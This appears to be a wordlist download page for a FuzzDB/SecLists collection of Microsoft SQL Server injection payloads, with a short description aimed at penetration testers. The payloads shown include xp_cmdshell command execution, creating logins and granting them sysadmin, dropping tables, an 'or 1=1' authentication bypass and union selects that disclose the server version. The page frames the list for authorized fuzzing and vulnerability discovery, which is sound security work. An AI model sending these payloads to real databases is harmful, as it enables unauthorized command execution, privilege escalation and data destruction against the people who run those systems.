MSSQL Injection (FuzzDB)

# you will need to customize/modify some of the vaules in the queries for best effect '; exec master..xp_cmdshell 'ping 10.10.1.2'-- 'create user name identified by 'pass123' -- 'create user name identified by pass123 temporary tablespace temp default tablespace users; ' ; drop table temp -- 'exec sp_addlogin 'name' , 'password' -- ' exec sp_addsrvrolemember 'name' , 'sysadmin' -- ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -- ' grant connect to name; grant resource to name; -- ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) ' or 1=1 -- ' union (select @@version) -- ' union (select NULL, (select @@version)) -- ' union (select NULL, NULL, (select @@version)) -- ' union (select NULL, NULL, NULL, (select @@version)) --

Microsoft SQL Server specific injection payloads including xp_cmdshell execution, login/role creation and version disclosure unions. Targets back ends confirmed to be MSSQL.

This list is geared toward input fuzzing and vulnerability discovery. It contains roughly 1.0 KB and pairs well with tools such as sqlmap, burp. Pick the smallest list that fits your engagement: shorter lists are faster and quieter for online attacks, while larger lists give broader coverage for offline work where speed is less of a constraint.

You can copy the sample preview straight from this page, copy the entire list to your clipboard, or download the raw .txt file. The full list is served directly from its upstream source on GitHub.

Sourced from danielmiessler/SecLists and distributed under MIT. Only use wordlists against systems you are explicitly authorized to test.

Preview